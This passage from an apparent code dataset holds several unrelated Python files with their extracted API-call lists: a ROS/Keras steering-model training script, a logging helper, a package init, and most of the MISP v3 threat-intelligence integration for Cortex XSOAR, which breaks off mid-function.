'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((10, 24, 10, 35), 'sqlalchemy.String', 'String', ({(10, 31, 10, 34): '255'}, {}), '(255)', False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((11, 23, 11, 34), 'sqlalchemy.String', 'String', ({(11, 30, 11, 33): '255'}, {}), '(255)', False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((12, 19, 12, 30), 'sqlalchemy.String', 'String', ({(12, 26, 12, 29): '255'}, {}), '(255)', False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((13, 22, 13, 33), 'sqlalchemy.String', 'String', ({(13, 29, 13, 32): '255'}, {}), '(255)', False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((56, 21, 56, 31), 'sqlalchemy.String', 'String', ({(56, 28, 56, 30): '10'}, {}), '(10)', False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((57, 30, 57, 52), 'sqlalchemy.ForeignKey', 'ForeignKey', ({(57, 41, 57, 51): '"""users.id"""'}, {}), "('users.id')", False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((61, 30, 61, 54), 'sqlalchemy.ForeignKey', 'ForeignKey', ({(61, 41, 61, 53): '"""vendors.id"""'}, {}), "('vendors.id')", False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((69, 30, 69, 52), 'sqlalchemy.ForeignKey', 'ForeignKey', ({(69, 41, 69, 51): '"""users.id"""'}, {}), "('users.id')", False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((70, 30, 70, 54), 'sqlalchemy.ForeignKey', 'ForeignKey', ({(70, 41, 70, 53): '"""vendors.id"""'}, {}), "('vendors.id')", False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((78, 18, 78, 29), 'sqlalchemy.String', 'String', ({(78, 25, 78, 28): '255'}, {}), '(255)', False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((79, 23, 79, 34), 'sqlalchemy.String', 'String', ({(79, 30, 79, 33): '255'}, {}), '(255)', False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((80, 20, 80, 31), 'sqlalchemy.String', 'String', ({(80, 27, 80, 30): '255'}, {}), '(255)', False, 'from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float\n'), ((58, 57, 58, 80), 'datetime.datetime.now', 'datetime.datetime.now', ({}, {}), '()', False, 'import datetime\n'), ((72, 57, 72, 80), 'datetime.datetime.now', 'datetime.datetime.now', ({}, {}), '()', False, 'import datetime\n')]
ebretl/roboracing-software
rr_ml/nodes/end_to_end/train.py
8803c97a885500069d04e70894b19f807ae5baf9
import os import math import string import numpy as np import rospy import keras from keras.models import Sequential from keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPooling2D, \ GaussianNoise, BatchNormalization import cv2 import collections import random import time from example_set import ExampleSet from params import input_shape, expand_categories n_examples_to_load = 8000 # if the number of training examples is below this, load more data batch_size = 16 categories = [None] def defineCategory(steering): differences = [abs(steering - category) for category in categories] category = np.argmin(differences) oneHot = [1 if i == category else 0 for i in range(len(categories))] return oneHot def format_inputs(examples): data2 = np.zeros((len(examples),) + input_shape, dtype='float32') for i, ex in enumerate(examples): data2[i] = ex.get_image() data2 /= 255.0 return data2 def make_model(): model = Sequential() # 128 x 48 model.add(GaussianNoise(0.05, input_shape=input_shape)) model.add(Conv2D(32, (3, 3), activation='relu', padding='same')) model.add(MaxPooling2D((4, 4))) # 32 x 12 model.add(Conv2D(64, (3, 3), activation='relu', padding='same')) model.add(MaxPooling2D((2, 2))) # 16 x 6 model.add(Flatten()) model.add(Dropout(0.25)) model.add(Dense(128, activation='relu')) model.add(Dense(32, activation='relu')) model.add(Dropout(0.35)) model.add(Dense(len(categories), activation='softmax')) model.compile(loss=keras.losses.categorical_crossentropy, optimizer=keras.optimizers.Adadelta(), metrics=['accuracy']) return model def main(): global categories, n_examples_to_load, batch_size rospy.init_node("nn_training") startTime = time.time() model_path = rospy.get_param("~model_output_path") exampleSetDir = rospy.get_param("~example_set_dir") epochs = int(rospy.get_param("~epochs")) categories = rospy.get_param("~positive_nonzero_categories") categories = string.strip(categories).split(" ") categories = [float(x) for x in categories] categories = expand_categories(categories) model = make_model() model.summary() exampleSetFiles_const = tuple(f for f in os.listdir(exampleSetDir) if '.pkl.lz4' in f) n_training_examples = 0 n_test_examples = 0 cnt = collections.Counter() for f in exampleSetFiles_const: data = ExampleSet.load(os.path.join(exampleSetDir, f)) n_training_examples += len(data.train) n_test_examples += len(data.test) for ex in data.train: i = np.argmax(defineCategory(ex.angle)) cnt[i] += 1 print "total training examples:", n_training_examples print "training label counts:", cnt def batch_generator(isValidation = False): gen_epochs = 1 if isValidation else epochs for epoch in range(gen_epochs): exampleSetFiles = list(exampleSetFiles_const) random.shuffle(exampleSetFiles) while len(exampleSetFiles) > 0: D = [] while len(exampleSetFiles) > 0 and len(D) < n_examples_to_load: data = ExampleSet.load(os.path.join(exampleSetDir, exampleSetFiles.pop())) D += data.test if isValidation else data.train if not isValidation: random.shuffle(D) X = format_inputs(D) # create output bins labels = np.array([defineCategory(ex.angle) for ex in D]) if not isValidation: for i in range(len(X)): if random.random() < 0.4: # 40% of images are flipped X[i] = cv2.flip(X[i], 1) labels[i] = labels[i][::-1] for i in range(0, len(X), batch_size): xs = X[i: i + batch_size] ys = labels[i: i + batch_size] yield (xs, ys) try: n_minibatches = int(math.ceil(float(n_training_examples) / batch_size)) model.fit_generator(batch_generator(), steps_per_epoch=n_minibatches, epochs=epochs, verbose=1) print "elapsed time:", time.time() - startTime n_minibatches = int(math.ceil(float(n_test_examples) / batch_size)) loss, acc = model.evaluate_generator(batch_generator(True), steps=n_minibatches) print "validation loss:", loss, "| validation accuracy:", acc finally: model.save(model_path) print "\nsaved model to", model_path
[]
heureka-code/Kronos-heureka-code
build/lib/Kronos_heureka_code/Zeit/__init__.py
0ddbc93ec69f0bc50075071e6a3e406c9cc97737
from Kronos_heureka_code.Zeit.Uhrzeit import Uhrzeit, Stunde, Minute, Sekunde from Kronos_heureka_code.Zeit.Datum.Monat import Monate from Kronos_heureka_code.Zeit.Datum.Jahr import Jahr, Zeitrechnung from Kronos_heureka_code.Zeit.Datum.Tag import Tag
[]
cthoyt/retro_star
retro_star/utils/logger.py
280231eb2f5dffc0e14bed300d770977b323205a
import logging def setup_logger(fname=None, silent=False): if fname is None: logging.basicConfig( level=logging.INFO if not silent else logging.CRITICAL, format='%(name)-12s: %(levelname)-8s %(message)s', datefmt='%m-%d %H:%M', filemode='w' ) else: logging.basicConfig( level=logging.INFO if not silent else logging.CRITICAL, format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s', datefmt='%m-%d %H:%M', filename=fname, filemode='w' ) console = logging.StreamHandler() console.setLevel(logging.INFO) formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s') console.setFormatter(formatter) logging.getLogger('').addHandler(console)
[((6, 8, 11, 9), 'logging.basicConfig', 'logging.basicConfig', (), '', False, 'import logging\n'), ((13, 8, 19, 9), 'logging.basicConfig', 'logging.basicConfig', (), '', False, 'import logging\n'), ((20, 18, 20, 41), 'logging.StreamHandler', 'logging.StreamHandler', ({}, {}), '()', False, 'import logging\n'), ((22, 20, 22, 81), 'logging.Formatter', 'logging.Formatter', ({(22, 38, 22, 80): '"""%(name)-12s: %(levelname)-8s %(message)s"""'}, {}), "('%(name)-12s: %(levelname)-8s %(message)s')", False, 'import logging\n'), ((24, 8, 24, 29), 'logging.getLogger', 'logging.getLogger', ({(24, 26, 24, 28): '""""""'}, {}), "('')", False, 'import logging\n')]
hiep4hiep/content
Packs/MISP/Integrations/MISPV3/MISPV3.py
f609c4c9548fe2188e8e2e00b2c9e80a74e24427
# type: ignore from typing import Union, List, Dict from urllib.parse import urlparse import urllib3 from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute from pymisp.tools import GenericObjectGenerator import copy from pymisp.tools import FileObject from CommonServerPython import * logging.getLogger("pymisp").setLevel(logging.CRITICAL) def handle_connection_errors(error): if "SSLError" in error: return_error('Unable to connect to MISP because of a SSLCertVerificationError, ' 'Please try to use the Trust any certificate option.') if "NewConnectionError" in error: return_error('Unable to connect to MISP because of a NewConnectionError, ' 'Please make sure your MISP server url is correct.') if "Please make sure the API key and the URL are correct" in error: return_error('Unable to connect to MISP, ' 'Please make sure the API key is correct.') return_error(error) def warn(*args): """ Do nothing with warnings """ pass # Disable requests warnings urllib3.disable_warnings() # Disable python warnings warnings.warn = warn ''' GLOBALS/PARAMS ''' params = demisto.params() if not params.get('credentials') or not (MISP_API_KEY := params.get('credentials', {}).get('password')): raise DemistoException('Missing API Key. Fill in a valid key in the integration configuration.') MISP_URL = params.get('url') VERIFY = not params.get('insecure') PROXIES = handle_proxy() # type: ignore try: PYMISP = ExpandedPyMISP(url=MISP_URL, key=MISP_API_KEY, ssl=VERIFY, proxies=PROXIES) except PyMISPError as e: handle_connection_errors(e.message) PREDEFINED_FEEDS = { 'CIRCL': {'name': 'CIRCL OSINT Feed', 'url': 'https://www.circl.lu/doc/misp/feed-osint', 'format': 'misp', 'input': 'network'}, 'Botvrij.eu': {'name': 'The Botvrij.eu Data', 'url': 'http://www.botvrij.eu/data/feed-osint', 'format': 'misp', 'input': 'network'} } THREAT_LEVELS_TO_ID = { 'High': 1, 'Medium': 2, 'Low': 3, 'Unknown': 4 } MISP_ENTITIES_TO_CONTEXT_DATA = { 'deleted': 'Deleted', 'category': 'Category', 'comment': 'Comment', 'uuid': 'UUID', 'sharing_group_id': 'SharingGroupID', 'timestamp': 'LastChanged', 'to_ids': 'ToIDs', 'value': 'Value', 'event_id': 'EventID', 'ShadowAttribute': 'ShadowAttribute', 'disable_correlation': 'DisableCorrelation', 'distribution': 'Distribution', 'type': 'Type', 'id': 'ID', 'date': 'CreationDate', 'info': 'Info', 'published': 'Published', 'attribute_count': 'AttributeCount', 'proposal_email_lock': 'ProposalEmailLock', 'locked': 'Locked', 'publish_timestamp': 'PublishTimestamp', 'event_creator_email': 'EventCreatorEmail', 'name': 'Name', 'analysis': 'Analysis', 'threat_level_id': 'ThreatLevelID', 'old_id': 'OldID', 'org_id': 'OrganizationID', 'Org': 'Organization', 'Orgc': 'OwnerOrganization', 'orgc_uuid': 'OwnerOrganization.UUID', 'orgc_id': 'OwnerOrganization.ID', 'orgc_name': 'OwnerOrganization.Name', 'event_uuid': 'EventUUID', 'proposal_to_delete': 'ProposalToDelete', 'description': 'Description', 'version': 'Version', 'Object': 'Object', 'object_id': 'ObjectID', 'object_relation': 'ObjectRelation', 'template_version': 'TemplateVersion', 'template_uuid': 'TemplateUUID', 'meta-category': 'MetaCategory', 'decay_score': 'DecayScore', 'first_seen': 'first_seen', 'last_seen': 'last_seen', 'provider': 'Provider', 'source_format': 'SourceFormat', 'url': 'URL', 'event_uuids': 'EventUUIDS', } MISP_ANALYSIS_TO_IDS = { 'initial': 0, 'ongoing': 1, 'completed': 2 } MISP_DISTRIBUTION_TO_IDS = { 'Your_organization_only': 0, 'This_community_only': 1, 'Connected_communities': 2, 'All_communities': 3, 'Inherit_event': 5 } SIGHTING_TYPE_NAME_TO_ID = { 'sighting': 0, 'false_positive': 1, 'expiration': 2 } SIGHTING_TYPE_ID_TO_NAME = { '0': 'sighting', '1': 'false_positive', '2': 'expiration' } INDICATOR_TYPE_TO_DBOT_SCORE = { 'FILE': DBotScoreType.FILE, 'URL': DBotScoreType.URL, 'DOMAIN': DBotScoreType.DOMAIN, 'IP': DBotScoreType.IP, 'EMAIL': DBotScoreType.EMAIL, } DOMAIN_REGEX = ( r"([a-z¡-\uffff0-9](?:[a-z¡-\uffff0-9-]{0,61}" "[a-z¡-\uffff0-9])?(?:\\.(?!-)[a-z¡-\uffff0-9-]{1,63}(?<!-))*" "\\.(?!-)(?!(jpg|jpeg|exif|tiff|tif|png|gif|otf|ttf|fnt|dtd|xhtml|css" "|html)$)(?:[a-z¡-\uffff-]{2,63}|xn--[a-z0-9]{1,59})(?<!-)\\.?$" "|localhost)" ) MISP_SEARCH_ARGUMENTS = [ 'value', 'type', 'category', 'org', 'tags', 'from', 'to', 'event_id', 'uuid', 'to_ids', 'last', 'include_decay_score', 'include_sightings', 'include_correlations', 'limit', 'page', 'enforceWarninglist', 'include_feed_correlations', ] EVENT_FIELDS = [ 'id', 'orgc_id', 'org_id', 'date', 'threat_level_id', 'info', 'published', 'uuid', 'analysis', 'attribute_count', 'timestamp', 'distribution', 'proposal_email_lock', 'locked', 'publish_timestamp', 'sharing_group_id', 'disable_correlation', 'event_creator_email', 'Org', 'Orgc', 'RelatedEvent', 'Galaxy', 'Tag', 'decay_score', 'Object', 'Feed', ] ATTRIBUTE_FIELDS = [ 'id', 'event_id', 'object_id', 'object_relation', 'category', 'type', 'to_ids', 'uuid', 'timestamp', 'distribution', 'sharing_group_id', 'comment', 'deleted', 'disable_correlation', 'first_seen', 'last_seen', 'value', 'Event', 'Object', 'Galaxy', 'Tag', 'decay_score', 'Sighting', ] def extract_error(error: list) -> List[dict]: """ Extracting errors raised by PYMISP into readable response, for more information and examples please see UT: test_extract_error. Args: error: list of responses from error section Returns: List[Dict[str, any]]: filtered response """ return [{ 'code': err[0], 'message': err[1].get('message'), 'errors': err[1].get('errors') } for err in error] def dict_to_generic_object_format(args: dict) -> List[dict]: """ Converts args dict into a list, please see GenericObjectGenerator Class in Pymisp. Args: args: dictionary describes MISP object Returns: list: list containing dicts that GenericObjectGenerator can take. Examples: >>> {'ip': '8.8.8.8', 'domain': 'google.com'} [{'ip': '8.8.8.8'}, {'domain': 'google.com'}] """ return [{k: v} for k, v in args.items()] def build_generic_object(template_name: str, args: List[dict]) -> GenericObjectGenerator: """ Args: template_name: template name as described in https://github.com/MISP/misp-objects args: arguments to create the generic object Returns: GenericObjectGenerator: object created in MISP Example: args should look like: [{'analysis_submitted_at': '2018-06-15T06:40:27'}, {'threat_score': {value=95, to_ids=False}}, {'permalink': 'https://panacea.threatgrid.com/mask/samples/2e445ef5389d8b'}, {'heuristic_raw_score': 7.8385159793597}, {'heuristic_score': 96}, {'original_filename': 'juice.exe'}, {'id': '2e445ef5389d8b'}] # guardrails-disable-line """ misp_object = GenericObjectGenerator(template_name) misp_object.generate_attributes(args) return misp_object def misp_convert_timestamp_to_date_string(timestamp: Union[str, int]) -> str: """ Gets a timestamp from MISP response (1546713469) and converts it to human readable format """ return datetime.utcfromtimestamp(int(timestamp)).strftime('%Y-%m-%dT%H:%M:%SZ') if timestamp else "" def replace_keys_from_misp_to_context_data(obj_to_build: Union[dict, list, str]) -> Union[dict, list, str]: """ Replacing keys from MISP's format to Demisto's (as appear in ENTITIESDICT) Args: obj_to_build (Union[dict, list, str]): object to replace keys in Returns: Union[dict, list, str]: same object type that got in """ if isinstance(obj_to_build, list): return [replace_keys_from_misp_to_context_data(item) for item in obj_to_build] if isinstance(obj_to_build, dict): return { (MISP_ENTITIES_TO_CONTEXT_DATA[key] if key in MISP_ENTITIES_TO_CONTEXT_DATA else key): replace_keys_from_misp_to_context_data(value) for key, value in obj_to_build.items() } return obj_to_build def reputation_command_to_human_readable(outputs, score, events_to_human_readable): found_tag_id, found_tag_name = "", "" for event in events_to_human_readable: # removing those fields as they are shared by the events found_tag_id = event.pop('Tag_ID') found_tag_name = event.pop('Tag_Name') return { 'Attribute Type': outputs[0].get('Type'), 'Dbot Score': score, 'Attribute Value': outputs[0].get('Value'), 'Attribute Category': outputs[0].get('Category'), 'Timestamp': outputs[0].get('Timestamp'), 'Events with the scored tag': events_to_human_readable, 'Scored Tag ID': found_tag_id, 'Scored Tag Name': found_tag_name, } def limit_tag_output_to_id_and_name(attribute_dict, is_event_level): """ As tag list can be full of in unnecessary data, we want to limit this list to include only the ID and Name fields. In addition, returns set of the found tag ids. Some tags have a field called inherited. When it is set to 1 it says that it is an event's tag. Otherwise (if it is set to 0 or not exists) it says that it is an attribute's tag. If the data is event's (is_event_level = true) we would like to add to tag_set_ids all the tags (event ones and the event's attribute tags ones as it is part of the event scope). If the data is attribute's (is_event_level = false), and the tag is only related to an attribute we would like to add it to tag_set_ids. In any other case, we won't add the tag. Args: attribute_dict (dict): The dictionary that includes the tag list. is_event_level (bool): Whether the attribute_dict was received from an event object, meaning the tags are event's ones. Otherwise, the data is attribute's (attribute tags). """ output = [] tag_set_ids = set() tags_list = attribute_dict.get('Tag', []) for tag in tags_list: is_event_tag = tag.get('inherited', 0) # field doesn't exist when this is an attribute level, default is '0' tag_id = tag.get('id') if is_event_level: tag_set_ids.add(tag_id) else: # attribute level if not is_event_tag: tag_set_ids.add(tag_id) output.append({'ID': tag_id, 'Name': tag.get('name')}) return output, tag_set_ids def parse_response_reputation_command(misp_response, malicious_tag_ids, suspicious_tag_ids, attributes_limit): """ After getting all the attributes which match the required indicator value, this function parses the response. This function goes over all the attributes that found (after limit the attributes amount to the given limit) and by sub-functions calculated the score of the indicator. For the context data outputs, for every attribute we remove the "Related Attribute" list and limits the tags and galaxies lists. Eventually, the outputs will be a list of attributes along with their events objects. Note: When limits the attributes amount, we sort the attributes list by the event ids as the greater event ids are the newer ones. Returns: response (dict): The parsed outputs to context data (array of attributes). score: the indicator score found_tag: the tag (id) which made the indicator to get that score found_related_events (dict): contains info (name, id, threat level id) about all the events that include the indicator Please see an example for a response in test_data/reputation_command_response.json Please see an example for a parsed output in test_data/reputation_command_outputs.json """ response = copy.deepcopy(misp_response) attributes_list = response.get('Attribute') if not attributes_list: return None attributes_list = sorted(attributes_list, key=lambda attribute_item: attribute_item['event_id'], reverse=True)[:attributes_limit] found_related_events, attributes_tag_ids, event_tag_ids = prepare_attributes_array_to_context_data(attributes_list) attribute_in_event_with_bad_threat_level = found_event_with_bad_threat_level_id(found_related_events) score, found_tag = get_score(attribute_tags_ids=attributes_tag_ids, event_tags_ids=event_tag_ids, malicious_tag_ids=malicious_tag_ids, suspicious_tag_ids=suspicious_tag_ids, is_attribute_in_event_with_bad_threat_level=attribute_in_event_with_bad_threat_level) formatted_response = replace_keys_from_misp_to_context_data({'Attribute': attributes_list}) return formatted_response, score, found_tag, found_related_events def prepare_attributes_array_to_context_data(attributes_list): attributes_tag_ids, event_tag_ids = set(), set() found_related_events = {} if not attributes_list: return None for attribute in attributes_list: attribute.pop("RelatedAttribute") # get rid of this useless list event = attribute.get('Event') convert_timestamp_to_readable(attribute, event) found_related_events[event.get("id")] = {"Event Name": event.get("info"), "Threat Level ID": event.get('threat_level_id'), "Event ID": event.get("id")} if event.get('Tag'): limit_tag_output, tag_ids = limit_tag_output_to_id_and_name(event, True) event['Tag'] = limit_tag_output event_tag_ids.update(tag_ids) if attribute.get('Tag'): limit_tag_output, tag_ids = limit_tag_output_to_id_and_name(attribute, False) attribute['Tag'] = limit_tag_output attributes_tag_ids.update(tag_ids) return found_related_events, attributes_tag_ids, event_tag_ids def convert_timestamp_to_readable(attribute, event): if attribute.get('timestamp'): attribute['timestamp'] = misp_convert_timestamp_to_date_string(attribute.get('timestamp')) if event: if event.get('timestamp'): attribute['Event']['timestamp'] = misp_convert_timestamp_to_date_string(event.get('timestamp')) if event.get('publish_timestamp'): attribute['Event']['publish_timestamp'] = misp_convert_timestamp_to_date_string( event.get('publish_timestamp')) def found_event_with_bad_threat_level_id(found_related_events): bad_threat_level_ids = ["1", "2", "3"] for event in found_related_events.values(): if event['Threat Level ID'] in bad_threat_level_ids: return True return False def get_score(attribute_tags_ids, event_tags_ids, malicious_tag_ids, suspicious_tag_ids, is_attribute_in_event_with_bad_threat_level): """ Calculates the indicator score by following logic. Indicators of attributes and Events that: * have tags which configured as malicious will be scored 3 (i.e malicious). * have tags which configured as suspicious will be scored 2 (i.e suspicious). * don't have any tags configured as suspicious nor malicious will be scored by their event's threat level id. In such case, the score will be BAD if the threat level id is in [1,2,3]. Otherwise, the threat level is 4 = Unknown. note: - In case the same tag appears in both Malicious tag ids and Suspicious tag ids lists the indicator will be scored as malicious. - Attributes tags (both malicious and suspicious) are stronger than events' tags. """ found_tag = None is_attribute_tag_malicious = any((found_tag := tag) in attribute_tags_ids for tag in malicious_tag_ids) if is_attribute_tag_malicious: return Common.DBotScore.BAD, found_tag is_attribute_tag_suspicious = any((found_tag := tag) in attribute_tags_ids for tag in suspicious_tag_ids) if is_attribute_tag_suspicious: return Common.DBotScore.SUSPICIOUS, found_tag is_event_tag_malicious = any((found_tag := tag) in event_tags_ids for tag in malicious_tag_ids) if is_event_tag_malicious: return Common.DBotScore.BAD, found_tag is_event_tag_suspicious = any((found_tag := tag) in event_tags_ids for tag in suspicious_tag_ids) if is_event_tag_suspicious: return Common.DBotScore.SUSPICIOUS, found_tag # no tag was found if is_attribute_in_event_with_bad_threat_level: return Common.DBotScore.BAD, None return Common.DBotScore.NONE, None def get_new_misp_event_object(args): """ Create a new MISP event object and set the event's details. """ event = MISPEvent() event.distribution = MISP_DISTRIBUTION_TO_IDS[args.get('distribution')] threat_level_id_arg = args.get('threat_level_id') if threat_level_id_arg: event.threat_level_id = THREAT_LEVELS_TO_ID[threat_level_id_arg] analysis_arg = args.get('analysis') event.analysis = MISP_ANALYSIS_TO_IDS.get(analysis_arg) if analysis_arg in MISP_ANALYSIS_TO_IDS else analysis_arg event.info = args.get('info') if args.get('info') else 'Event from XSOAR' event.date = datetime.today() event.published = argToBoolean(args.get('published', 'False')) return event def create_event_command(demisto_args: dict): """Creating event in MISP with the given attribute args""" new_event = get_new_misp_event_object(demisto_args) new_event = PYMISP.add_event(new_event, True) if isinstance(new_event, dict) and new_event.get('errors'): raise DemistoException(new_event.get('errors')) event_id = new_event.id add_attribute(event_id=event_id, internal=True, new_event=new_event, demisto_args=demisto_args) event = PYMISP.search(eventid=event_id) human_readable = f"## MISP create event\nNew event with ID: {event_id} has been successfully created.\n" return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Event', outputs_key_field='ID', outputs=build_events_search_response(event), raw_response=event ) def add_attribute(event_id: int = None, internal: bool = False, demisto_args: dict = {}, new_event: MISPEvent = None): """Adding attribute to a given MISP event object This function can be called as an independence command or as part of another command (create event for example) Args: event_id (int): Event ID to add attribute to internal (bool): if set to True, will not post results to Demisto demisto_args (dict): Demisto args new_event (MISPEvent): When this function was called from create event command, the attrubite will be added to that existing event. """ attributes_args = { 'id': demisto_args.get('event_id'), # misp event id 'type': demisto_args.get('type', 'other'), 'category': demisto_args.get('category', 'External analysis'), 'to_ids': argToBoolean(demisto_args.get('to_ids', True)), 'comment': demisto_args.get('comment'), 'value': demisto_args.get('value') } event_id = event_id if event_id else arg_to_number(demisto_args.get('event_id'), "event_id") attributes_args.update({'id': event_id}) if event_id else None distribution = demisto_args.get('distribution') attributes_args.update({'distribution': MISP_DISTRIBUTION_TO_IDS[distribution]}) if distribution else None if not new_event: response = PYMISP.search(eventid=event_id, pythonify=True) if not response: raise DemistoException( f"Error: An event with the given id: {event_id} was not found in MISP. please check it once again") new_event = response[0] # response[0] is MISP event new_event.add_attribute(**attributes_args) PYMISP.update_event(event=new_event) if internal: return value = attributes_args.get('value') updated_event = PYMISP.search(eventid=new_event.id, controller='attributes', value=value) human_readable = f"## MISP add attribute\nNew attribute: {value} was added to event id {new_event.id}.\n" return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Attribute', outputs_key_field='ID', outputs=build_attributes_search_response(updated_event), raw_response=updated_event ) def generic_reputation_command(demisto_args, reputation_type, dbot_type, malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit): reputation_value_list = argToList(demisto_args.get(reputation_type), ',') command_results = [] for value in reputation_value_list: command_results.append( get_indicator_results(value, dbot_type, malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit)) return command_results def reputation_value_validation(value, dbot_type): if dbot_type == 'FILE': # hashFormat will be used only in output hash_format = get_hash_type(value) if hash_format == 'Unknown': raise DemistoException('Invalid hash length, enter file hash of format MD5, SHA-1 or SHA-256') if dbot_type == 'IP': if not is_ip_valid(value): raise DemistoException(f"Error: The given IP address: {value} is not valid") if dbot_type == 'DOMAIN': if not re.compile(DOMAIN_REGEX, regexFlags).match(value): raise DemistoException(f"Error: The given domain: {value} is not valid") if dbot_type == 'URL': if not re.compile(urlRegex, regexFlags).match(value): raise DemistoException(f"Error: The given url: {value} is not valid") if dbot_type == 'EMAIL': if not re.compile(emailRegex, regexFlags).match(value): raise DemistoException(f"Error: The given email address: {value} is not valid") def get_indicator_results(value, dbot_type, malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit): """ This function searches for the given attribute value in MISP and then calculates it's dbot score. The score is calculated by the tags ids (attribute tags and event tags). Args: value (str): The indicator value (an IP address, email address, domain, url or file hash). dbot_type (str): Indicator type (file, url, domain, email or ip). malicious_tag_ids (set): Tag ids should be recognised as malicious. suspicious_tag_ids (set): Tag ids should be recognised as suspicious reliability (DBotScoreReliability): integration reliability score. attributes_limit (int) : Limits the number of attributes that will be written to the context Returns: CommandResults includes all the indicator results. """ reputation_value_validation(value, dbot_type) misp_response = PYMISP.search(value=value, controller='attributes', include_context=True, include_correlations=True, include_event_tags=True, enforce_warninglist=True, include_decay_score=True, includeSightings=True) indicator_type = INDICATOR_TYPE_TO_DBOT_SCORE[dbot_type] is_indicator_found = misp_response and misp_response.get('Attribute') if is_indicator_found: outputs, score, found_tag, found_related_events = parse_response_reputation_command(misp_response, malicious_tag_ids, suspicious_tag_ids, attributes_limit) dbot = Common.DBotScore(indicator=value, indicator_type=indicator_type, score=score, reliability=reliability, malicious_description="Match found in MISP") indicator = get_dbot_indicator(dbot_type, dbot, value) all_attributes = outputs.get('Attribute') events_to_human_readable = get_events_related_to_scored_tag(all_attributes, found_tag) attribute_highlights = reputation_command_to_human_readable(all_attributes, score, events_to_human_readable) readable_output = tableToMarkdown(f'Results found in MISP for value: {value}', attribute_highlights, removeNull=True) readable_output += tableToMarkdown('Related events', list(found_related_events.values())) return CommandResults(indicator=indicator, raw_response=misp_response, outputs=all_attributes, outputs_prefix='MISP.Attribute', outputs_key_field='ID', readable_output=readable_output) else: dbot = Common.DBotScore(indicator=value, indicator_type=indicator_type, score=Common.DBotScore.NONE, reliability=reliability, malicious_description="No results were found in MISP") indicator = get_dbot_indicator(dbot_type, dbot, value) return CommandResults(indicator=indicator, readable_output=f"No attributes found in MISP for value: {value}") def get_events_related_to_scored_tag(all_attributes, found_tag): """ This function searches for all the events that have the tag (i.e found_tag) which caused the indicator to be scored as malicious or suspicious. Args: all_attributes (dict): The parsed response from the MISP search attribute request found_tag (str): The tag that was scored as malicious or suspicious. If no tag was found, then the score is Unknown so no events should be found. Returns: list includes all the events that were detected as related to the tag. """ scored_events = [] if found_tag: for attribute in all_attributes: event = attribute.get('Event', {}) event_name = event.get('Info') scored_events.extend(search_events_with_scored_tag(event, found_tag, event_name)) scored_events.extend(search_events_with_scored_tag(attribute, found_tag, event_name)) return remove_duplicated_related_events(scored_events) def remove_duplicated_related_events(related_events): related_events_no_duplicates = [] for i in range(len(related_events)): if related_events[i] not in related_events[i + 1:]: related_events_no_duplicates.append(related_events[i]) return related_events_no_duplicates def search_events_with_scored_tag(object_data_dict, found_tag, event_name): """ By the given object we go over all the tags and search if found_tag is one of it's tags. If so, the event will be added to related_events list Args: object_data_dict (dict): Event or attribute dict which includes tags list. found_tag (str): The tag that was scored as malicious or suspicious. event_name (str): Name of the event """ related_events = [] object_tags_list = object_data_dict.get('Tag', []) for tag in object_tags_list: if tag.get('ID') == found_tag: event_id = get_event_id(object_data_dict) tag_name = tag.get('Name') related_events.append({'Event_ID': event_id, 'Event_Name': event_name, 'Tag_Name': tag_name, 'Tag_ID': tag.get('ID')}) return related_events def get_event_id(data_dict): if data_dict.get('EventID'): return data_dict.get('EventID') elif data_dict.get('ID'): return data_dict.get('ID') return data_dict.get('Event', {}).get('ID') def get_dbot_indicator(dbot_type, dbot_score, value): if dbot_type == "FILE": hash_type = get_hash_type(value) if hash_type == 'md5': return Common.File(dbot_score=dbot_score, md5=value) if hash_type == 'sha1': return Common.File(dbot_score=dbot_score, sha1=value) if hash_type == 'sha256': return Common.File(dbot_score=dbot_score, sha256=value) if dbot_type == "IP": return Common.IP(ip=value, dbot_score=dbot_score) if dbot_type == "DOMAIN": return Common.Domain(domain=value, dbot_score=dbot_score) if dbot_type == "EMAIL": return Common.EMAIL(address=value, dbot_score=dbot_score) if dbot_type == "URL": return Common.URL(url=value, dbot_score=dbot_score) def build_misp_complex_filter(demisto_query: str): """ Examples are available in UT: test_build_misp_complex_filter. For more information please see build_complex_query in pymisp/api.py Args: demisto_query: complex query contains saved words: 'AND:', 'OR:' and 'NOT:' using ',' as delimiter for parameters and ';' as delimiter for operators. using the operators is optional. if 'demisto_query' does not contains any of the complex operators the original input will be returned Returns: str: dictionary created for misp to perform complex query or if no complex query found returns the original input """ regex_and = r'(AND:)([^\;]+)(;)?' regex_or = r'(OR:)([^\;]+)(;)?' regex_not = r'(NOT:)([^\;]+)(;)?' misp_query_params = dict() match_and = re.search(regex_and, demisto_query, re.MULTILINE) match_or = re.search(regex_or, demisto_query, re.MULTILINE) match_not = re.search(regex_not, demisto_query, re.MULTILINE) is_complex_and_operator = is_misp_complex_search_helper(match_and, misp_query_params, 'and_parameters') is_complex_or_operator = is_misp_complex_search_helper(match_or, misp_query_params, 'or_parameters') is_complex_not_operator = is_misp_complex_search_helper(match_not, misp_query_params, 'not_parameters') is_complex_search = is_complex_and_operator or is_complex_or_operator or is_complex_not_operator if is_complex_search: return PYMISP.build_complex_query(**misp_query_params) return 